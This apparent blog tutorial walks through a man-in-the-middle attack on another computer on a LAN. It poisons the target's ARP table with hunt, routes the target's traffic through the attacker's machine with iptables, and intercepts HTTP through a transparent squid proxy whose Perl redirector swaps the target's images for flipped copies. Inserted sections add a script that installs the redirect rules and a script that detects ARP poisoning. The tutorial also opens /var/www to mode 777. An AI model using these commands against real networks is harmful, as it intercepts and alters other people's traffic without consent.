Tuesday, March 22, 2011

How to hack the computer in your LAN?

This is what we want to do:
  • Make the target send all HTTP packets to us instead of to the gateway
  • Forward them to the real gateway
  • Modify the reply, turning the pictures upside-down
  • Forward the reply to the target
This is how we’re going to do it:
  1. Poison the ARP table of the target
  2. Set up our pc as a gateway router
  3. Send all HTTP requests through a squid proxy
  4. Turn images upside-down with a squid script

Ok, sounds great, let’s get started!

1. Poison the ARP table of the target
We want the target to send all its packets to us instead of to the real gateway. To do this we need to know a little about IP addresses and MAC addresses. When a host wants to send a packet to an IP address on the local LAN, it broadcasts an ARP request saying “Which computer is at this IP?”, and the owner answers with an ARP reply “I am at that IP, with MAC address 11:22:33:44:55:66”.

Then the packet is sent to 11:22:33:44:55:66. ARP replies are cached in a local ARP table, so the next time we want to send to the same IP we don’t need to ask who has it. We are going to send a fake ARP reply to the target, saying that the gateway’s IP address is at our MAC address. ARP replies are usually accepted even though no request was sent, and a new reply simply overwrites the cached entry, so this is actually really easy.
How do I do this?
We can use arpoison to construct a fake packet and send it, but I prefer another, a bit more powerful tool called hunt. You can download the hunt source code here, and compile it like this:

tar zxvf hunt-1.5.tgz
cd hunt-1.5
make

Fire up hunt:
sudo ./hunt
In the menu system go to
a) daemons rst/arp/sniff/mac
b) arp spoof + arp relayer daemon
c) insert single/range arp spoof
d) start/stop relayer daemon (press s)
Type in the IP of the real gateway, your own MAC address (find it by running ifconfig), and the target’s IP. Now we have poisoned the ARP table of the target. You can confirm the poisoning by typing “arp -a” on the target and checking that the gateway’s IP is now listed with your MAC address.
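
The “arp -a” check above is done by eye. The script below, an added example that is not part of the original post, automates it: it parses an ARP table dump in Linux net-tools format and reports whether the gateway entry carries the real gateway MAC, and it lists any MAC cached under more than one IP, which is what a poisoned table looks like (the attacker’s MAC under its own IP and under the gateway’s). The sample tables, the 192.168.0.x addresses and the MAC 00:aa:bb:cc:dd:ee are constructed for the example; 11:22:33:44:55:66 is the MAC used in the explanation above.

```shell
#!/bin/sh
# Added example: check a host's ARP table for a poisoned gateway entry.
# Expects Linux net-tools "arp -an" lines such as:
#   ? (192.168.0.1) at 00:aa:bb:cc:dd:ee [ether] on eth0

# arp_state TABLE GATEWAY_IP REAL_GATEWAY_MAC
# prints "clean", "poisoned <mac now cached>" or "absent" (no complete entry)
arp_state() {
    table=$1
    gw="($2)"
    real=$(printf '%s' "$3" | tr 'A-F' 'a-f')
    seen=$(printf '%s\n' "$table" | awk -v ip="$gw" '
        $2 == ip {
            # the MAC is the 17-character hex:hex:... field on that line
            for (i = 1; i <= NF; i++)
                if (length($i) == 17 && $i ~ /^[0-9a-fA-F:]*$/) { print tolower($i); exit }
        }')
    if [ -z "$seen" ]; then
        echo absent
    elif [ "$seen" = "$real" ]; then
        echo clean
    else
        echo "poisoned $seen"
    fi
}

# dup_macs TABLE: print every MAC that is cached for more than one IP.
# After a spoof the attacker's MAC shows up twice: under its own IP and the gateway's.
dup_macs() {
    printf '%s\n' "$1" | awk '
        { for (i = 1; i <= NF; i++)
              if (length($i) == 17 && $i ~ /^[0-9a-fA-F:]*$/) n[tolower($i)]++ }
        END { for (m in n) if (n[m] > 1) print m }' | sort
}

# check_live GATEWAY_IP REAL_GATEWAY_MAC: run against this host's own table
check_live() {
    t=$(arp -an)
    arp_state "$t" "$1" "$2"
    dup_macs "$t"
}

# Constructed sample tables (not real captures). Gateway 192.168.0.1 really has
# 00:aa:bb:cc:dd:ee; the attacker at 192.168.0.23 has 11:22:33:44:55:66.
CLEAN_TABLE='? (192.168.0.1) at 00:aa:bb:cc:dd:ee [ether] on eth0
? (192.168.0.23) at 11:22:33:44:55:66 [ether] on eth0
? (192.168.0.77) at <incomplete> on eth0'

POISONED_TABLE='? (192.168.0.1) at 11:22:33:44:55:66 [ether] on eth0
? (192.168.0.23) at 11:22:33:44:55:66 [ether] on eth0'

# Usage on the target once the spoof is running:  sh arpcheck.sh 192.168.0.1 00:aa:bb:cc:dd:ee
if [ "$#" -eq 2 ]; then
    check_live "$1" "$2"
fi
```

The gateway’s real MAC has to be recorded before the spoof starts (or read off the gateway itself); without that reference the script can only flag the duplicate-MAC symptom, which hunt’s spoof produces but which is also what you see on a LAN with a legitimately multi-homed box.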

2. Set up our pc as a gateway router
This is easy, just run these commands:

sudo iptables -F
sudo iptables -F -t nat
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
Where eth0 is your network interface connected to the LAN. The last line needs the sh -c wrapper: with a plain “sudo echo 1 > …” the redirection is done by your own shell, not by root, and fails. Nothing here is persistent; the rules and the forwarding flag are gone after a reboot (or as soon as something else flushes the tables).

3. Send all http requests through a squid proxy
Install squid and move its stock config out of the way:

sudo apt-get install squid
sudo mv /etc/squid/squid.conf /etc/squid/squid.conf.default
Note that the forwarding rules from step 2 alone just pass the target’s packets on to the real gateway. For the HTTP requests to actually go through squid, squid has to run as a transparent proxy and a NAT rule on our box has to redirect the target’s port-80 connections to squid’s port. Edit /etc/squid/squid.conf with your favorite editor like this:

visible_hostname gateway.my.flat
cache_mgr proxy@foo.com

# Transparent proxying, Squid 2.5 syntax. These four httpd_accel_* directives were
# removed in Squid 2.6; there the equivalent is a single line: http_port 3128 transparent
httpd_accel_host virtual
httpd_accel_port 80
httpd_accel_with_proxy on
httpd_accel_uses_host_header on

# "acl all src" still needs its network argument (0.0.0.0/0.0.0.0 on Squid 2.x)
acl all src
http_access allow all
# called url_rewrite_program from Squid 2.6 on (redirect_program still works as an alias)
redirect_program /var/redirect
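
Steps 2 and 3 as one script, an added example rather than the post’s own commands. It does what the iptables lines in step 2 do, plus the piece the post leaves implicit: a NAT rule that redirects the target’s port-80 connections arriving on the LAN interface into squid, so they actually pass through the proxy instead of being forwarded straight to the real gateway. It assumes eth0 is the LAN interface and that squid listens on 3128 in transparent mode; both can be overridden through the IFACE and SQUID_PORT variables, which belong to this script, not to squid or iptables. Run it without arguments to print the rules, with “apply” to install them as root, and with “down” to undo them.

```shell
#!/bin/sh
# Added example: make this box the target's gateway and push its HTTP into squid.
# Assumptions (not from the original post): eth0 is the LAN interface, squid runs
# locally on port 3128 with a transparent/intercept http_port.
IFACE=${IFACE:-eth0}
SQUID_PORT=${SQUID_PORT:-3128}

# gateway_rules IFACE PORT: print the commands instead of running them, so they
# can be reviewed (and checked without root) before anything is changed.
gateway_rules() {
    cat <<EOF
# forward packets between the target and the real gateway
sysctl -w net.ipv4.ip_forward=1
iptables -F
iptables -t nat -F
# HTTP arriving from the LAN side goes to squid. Only PREROUTING is touched, so
# squid's own upstream fetches (OUTPUT chain) are not looped back into squid.
iptables -t nat -A PREROUTING -i $1 -p tcp --dport 80 -j REDIRECT --to-ports $2
# everything else the target sends leaves as our own traffic
iptables -t nat -A POSTROUTING -o $1 -j MASQUERADE
EOF
}

# teardown_rules: the reverse, for when the demo is over
teardown_rules() {
    cat <<EOF
iptables -t nat -F
iptables -F
sysctl -w net.ipv4.ip_forward=0
EOF
}

# run_as_root: execute the command list on stdin, refusing to try without root
run_as_root() {
    [ "$(id -u)" -eq 0 ] || { echo "must run as root" >&2; return 1; }
    sh -e
}

case ${1:-show} in
    apply) gateway_rules "$IFACE" "$SQUID_PORT" | run_as_root ;;
    down)  teardown_rules | run_as_root ;;
    *)     gateway_rules "$IFACE" "$SQUID_PORT" ;;
esac
```

Squid has to be listening in transparent mode before the REDIRECT rule goes in; otherwise the target’s browser gets requests answered by a proxy that does not understand intercepted traffic, and the symptom is a hung or “invalid request” page on the target rather than an error on our box.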

4. Turn images upside-down with a squid script
We use the redirect program defined in the squid config to flip our images. Squid starts it once, feeds it one request per line and reads one answer per line, so the script just loops over its standard input. Edit /var/redirect to look like this (it is Perl):

#!/usr/bin/perl
# Squid redirector. Squid writes one line per request, "URL client_ip/fqdn ident method",
# and expects one line back: a replacement URL, or an empty line to leave the request alone.
use strict;
use warnings;

$| = 1;                       # flush every answer at once, or squid waits forever
my $myhost = "127.0.0.1";     # apache on this box; squid (not the target) fetches the new URL
my $pid    = $$;
my $count  = 0;

while (<>) {
    chomp;
    my ($url) = split / /, $_;                   # first field is the requested URL
    if (defined $url && $url =~ /\.(jpg|gif)(\?.*)?$/i) {
        my $ext  = lc $1;
        my $file = "/var/www/$pid-$count.$ext";
        # list-form system(): the URL is passed as an argument, never through a shell
        system("/usr/bin/wget", "-q", "-O", $file, $url);
        system("/usr/bin/mogrify", "-flip", $file);
        system("/bin/chmod", "644", $file);      # apache only needs to read it
        print "http://$myhost/$pid-$count.$ext\n";
        $count++;                                # one file per image, never overwritten
    } else {
        print "\n";                              # empty answer: not an image, pass it through
    }
}
As you can see from the script, the flipped images are served from a local webserver, so install apache:
sudo apt-get install apache2
sudo chmod -R 777 /var/www
The redirector runs as the user squid runs as (proxy on Debian/Ubuntu), so it needs to write into /var/www, which is what the chmod is for; chowning the directory to that user is the tighter alternative. /var/redirect itself must be readable and executable by that user as well, or squid will fail to start its helper.
At last, reload squid with the new configuration:
sudo /etc/init.d/squid restart
You can test squid by configuring your Firefox to use localhost as proxy server, on the port squid listens on (3128 unless you add an http_port line to the config).


